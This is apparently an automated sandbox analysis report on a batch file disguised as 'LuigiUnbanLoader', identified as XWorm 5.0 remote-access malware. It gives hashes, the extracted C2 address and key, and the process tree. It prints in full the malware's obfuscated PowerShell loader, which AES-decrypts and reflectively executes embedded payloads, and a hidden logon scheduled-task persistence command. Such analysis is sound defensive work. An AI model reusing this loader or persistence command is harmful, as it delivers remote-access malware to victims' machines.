Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-01-2025 16:46
Static task
static1
Behavioral task
behavioral1
Sample
LuigiUnbanLoader.bat
Resource
win7-20241010-en
General
-
Target
LuigiUnbanLoader.bat
-
Size
478KB
-
MD5
09c4764995d1f2e96d0a228743f2425e
-
SHA1
0a755c43e147141ec0e9d96d243765af66d1e8a0
-
SHA256
c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab
-
SHA512
856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e
-
SSDEEP
6144:Y5uDX7kLnB9tGFQe+6YRAFcqLw7DT8ZUXtk9clnD:Yo8LB2FQh64AFcqLw7kZ+uInD
Malware Config
Extracted
xworm
5.0
80.76.49.227:9999
g0vzRORqzebeaKQj
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4384-50-0x00000239E63F0000-0x00000239E63FE000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 5 IoCs
flow pid Process 15 4384 powershell.exe 87 4384 powershell.exe 90 4384 powershell.exe 97 4384 powershell.exe 98 4384 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3764 powershell.exe 2328 powershell.exe 4384 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3764 powershell.exe 3764 powershell.exe 2328 powershell.exe 2328 powershell.exe 4384 powershell.exe 4384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3764 powershell.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeIncreaseQuotaPrivilege 2328 powershell.exe Token: SeSecurityPrivilege 2328 powershell.exe Token: SeTakeOwnershipPrivilege 2328 powershell.exe Token: SeLoadDriverPrivilege 2328 powershell.exe Token: SeSystemProfilePrivilege 2328 powershell.exe Token: SeSystemtimePrivilege 2328 powershell.exe Token: SeProfSingleProcessPrivilege 2328 powershell.exe Token: SeIncBasePriorityPrivilege 2328 powershell.exe Token: SeCreatePagefilePrivilege 2328 powershell.exe Token: SeBackupPrivilege 2328 powershell.exe Token: SeRestorePrivilege 2328 powershell.exe Token: SeShutdownPrivilege 2328 powershell.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeSystemEnvironmentPrivilege 2328 powershell.exe Token: SeRemoteShutdownPrivilege 2328 powershell.exe Token: SeUndockPrivilege 2328 powershell.exe Token: SeManageVolumePrivilege 2328 powershell.exe Token: 33 2328 powershell.exe Token: 34 2328 powershell.exe Token: 35 2328 powershell.exe Token: 36 2328 powershell.exe Token: SeIncreaseQuotaPrivilege 2328 powershell.exe Token: SeSecurityPrivilege 2328 powershell.exe Token: SeTakeOwnershipPrivilege 2328 powershell.exe Token: SeLoadDriverPrivilege 2328 powershell.exe Token: SeSystemProfilePrivilege 2328 powershell.exe Token: SeSystemtimePrivilege 2328 powershell.exe Token: SeProfSingleProcessPrivilege 2328 powershell.exe Token: SeIncBasePriorityPrivilege 2328 powershell.exe Token: SeCreatePagefilePrivilege 2328 powershell.exe Token: SeBackupPrivilege 2328 powershell.exe Token: SeRestorePrivilege 2328 powershell.exe Token: SeShutdownPrivilege 2328 powershell.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeSystemEnvironmentPrivilege 2328 powershell.exe Token: SeRemoteShutdownPrivilege 2328 powershell.exe Token: SeUndockPrivilege 2328 powershell.exe Token: SeManageVolumePrivilege 2328 powershell.exe Token: 33 2328 powershell.exe Token: 34 2328 powershell.exe Token: 35 2328 powershell.exe Token: 36 2328 powershell.exe Token: SeIncreaseQuotaPrivilege 2328 powershell.exe Token: SeSecurityPrivilege 2328 powershell.exe Token: SeTakeOwnershipPrivilege 2328 powershell.exe Token: SeLoadDriverPrivilege 2328 powershell.exe Token: SeSystemProfilePrivilege 2328 powershell.exe Token: SeSystemtimePrivilege 2328 powershell.exe Token: SeProfSingleProcessPrivilege 2328 powershell.exe Token: SeIncBasePriorityPrivilege 2328 powershell.exe Token: SeCreatePagefilePrivilege 2328 powershell.exe Token: SeBackupPrivilege 2328 powershell.exe Token: SeRestorePrivilege 2328 powershell.exe Token: SeShutdownPrivilege 2328 powershell.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeSystemEnvironmentPrivilege 2328 powershell.exe Token: SeRemoteShutdownPrivilege 2328 powershell.exe Token: SeUndockPrivilege 2328 powershell.exe Token: SeManageVolumePrivilege 2328 powershell.exe Token: 33 2328 powershell.exe Token: 34 2328 powershell.exe Token: 35 2328 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1756 wrote to memory of 3764 1756 cmd.exe 83 PID 1756 wrote to memory of 3764 1756 cmd.exe 83 PID 3764 wrote to memory of 2328 3764 powershell.exe 85 PID 3764 wrote to memory of 2328 3764 powershell.exe 85 PID 3764 wrote to memory of 4680 3764 powershell.exe 87 PID 3764 wrote to memory of 4680 3764 powershell.exe 87 PID 4680 wrote to memory of 4848 4680 WScript.exe 88 PID 4680 wrote to memory of 4848 4680 WScript.exe 88 PID 4848 wrote to memory of 4384 4848 cmd.exe 90 PID 4848 wrote to memory of 4384 4848 cmd.exe 90
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LuigiUnbanLoader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\LuigiUnbanLoader.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_833_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_833.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_833.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_833.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Roaming\startup_str_833.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4384
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5dbbf71e9fb59f80938f09809b160e441
SHA18b9a517d846cb9a0a284f77ed88328236a85055f
SHA256e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1
SHA51290b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
478KB
MD509c4764995d1f2e96d0a228743f2425e
SHA10a755c43e147141ec0e9d96d243765af66d1e8a0
SHA256c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab
SHA512856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e
-
Filesize
115B
MD52b324f7b37142013ebdd9c70245e8705
SHA1831f67e767b635c496c685fe5a6974a06adcdc30
SHA256ef7e0c7282446c8748b0db139185e0e994d33889f7c75c84fde2399a0db1871a
SHA5124c77f9cb73fcae728ec57dc8b61c1bf95e7f2ba64a8db71966e552e9c648bf4e323fe542811f4973078dd4af6a336bbe338b6362d59b375c87b52976eeb5997b